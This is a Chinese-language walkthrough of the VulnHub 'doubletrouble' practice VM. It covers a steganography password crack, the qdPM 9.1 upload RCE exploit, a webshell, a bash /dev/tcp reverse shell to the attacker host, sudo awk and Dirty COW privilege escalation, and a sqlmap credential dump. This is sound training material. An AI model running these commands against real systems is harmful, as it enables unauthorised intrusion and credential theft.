NO.9 doubletrouble 靶场

admin
admin
admin
138635
文章
114
评论
2024年11月11日23:45:42评论10 views字数 1930阅读6分26秒阅读模式

NO.9 doubletrouble 靶场

01.靶场介绍

Description

get flags

difficulty: easy

about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.

This works better with VirtualBox rather than VMware

靶场链接:

https://www.vulnhub.com/entry/doubletrouble-1,743/#top

02.信息收集

端口信息

端口就开放22、80

NO.9 doubletrouble 靶场

指纹信息

NO.9 doubletrouble 靶场

searchsploit 搜一下,qdPM9.1 版本存在多个漏洞

NO.9 doubletrouble 靶场

NO.9 doubletrouble 靶场

这里我们使用https://www.exploit-db.com/exploits/47954 exp,但是需要账户密码,接下来再搜集信息;

目录信息

dirsearch -u http://192.168.56.105 -e php

目录扫描只发现一个比较有用的信息是一张图片,应该就是主题的。

NO.9 doubletrouble 靶场

NO.9 doubletrouble 靶场

下载下来使用steghide 隐写工具提取信息,但是存在密码,需要爆破密码先

NO.9 doubletrouble 靶场

使用 stegseek 工具进行爆破密码

https://github.com/RickdeJager/StegSeek

NO.9 doubletrouble 靶场

爆破成功获取密码后,我们使用密码提取隐写的信息,账户密码到手了。接下来尝试打 exp

NO.9 doubletrouble 靶场

03.获取权限

漏洞描述:qdPM 9.1版本中存在安全漏洞。攻击者可通过上传恶意的.php文件利用该漏洞在服务器上执行任意命令。https://jcyj.chd.edu.cn/2020/0422/c5172a126297/page.htm

https://www.exploit-db.com/exploits/47954
python3 qdPM.9.1.py -url http://192.168.56.105/ -u [email protected] -p otis666

NO.9 doubletrouble 靶场

EXP 写入后门文件,接下了写一个小马进去使用蚁剑方便操作

NO.9 doubletrouble 靶场

NO.9 doubletrouble 靶场

试一下全局找flag 并没有结果,接着来找一下账户密码

find / -name "*flag*"

NO.9 doubletrouble 靶场

看了一下系统用户和home 目录只有root 可登录,所以数据库这个密码目前没啥用处,接下来进行提权

NO.9 doubletrouble 靶场

04.权限提升

反弹一个shell 到Kali 方便提权,然后我们使用 python 获取一个交互shell,加配置tab 补全功能。

bash -c 'exec bash -i &>/dev/tcp/192.168.56.101/9090 <&1'

python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
Ctrl+z
stty -a
stty raw -echo;fg

NO.9 doubletrouble 靶场

sudo -l 查看后,发现可以直接使用sudo 提权,我们可以通过辅助网站可以查看使用命令

https://gtfobins.github.io/gtfobins/awk/#sudo

NO.9 doubletrouble 靶场

sudo awk 'BEGIN {system("/bin/sh")}'

NO.9 doubletrouble 靶场

python3 -c "import pty;pty.spawn('/bin/bash')"

NO.9 doubletrouble 靶场

提权后并没有发现存在flag,但是root目录下存在一个镜像,我们使用python3 开启一个http服务把它下载下来

NO.9 doubletrouble 靶场

导入第二个靶场后,只发现一个web 服务存在盲注:

NO.9 doubletrouble 靶场

使用sqlmap 跑出账号密码

sqlmap -u http://192.168.56.106/index.php --forms -D doubletrouble -T users --dump

Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| password | username |
+----------+----------+
| GfsZxc1  | montreux |
| ZubZub99 | clapton  |
+----------+----------+

NO.9 doubletrouble 靶场

但是这里的账号密码都登录不了。。。尝试登录ssh clapton 账号成功登录

NO.9 doubletrouble 靶场

获取一个FLAG

NO.9 doubletrouble 靶场

6CEA7A737C7C651F6DA7669109B5FB52

进去之后可以看到登录后存在一个命令执行漏洞:

NO.9 doubletrouble 靶场

接下来使用脏牛进行提权

NO.9 doubletrouble 靶场

https://github.com/FireFart/dirtycow

gcc -pthread dirty.c -o dirty -lcrypt
./dirty my-new-password
mv /tmp/passwd.bak /etc/passwd

提权后获取flagNO.9 doubletrouble 靶场

NO.9 doubletrouble 靶场

End

NO.9 doubletrouble 靶场

原文始发于微信公众号(贝雷帽SEC):NO.9 doubletrouble 靶场

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月11日23:45:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   NO.9 doubletrouble 靶场https://cn-sec.com/archives/1823354.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息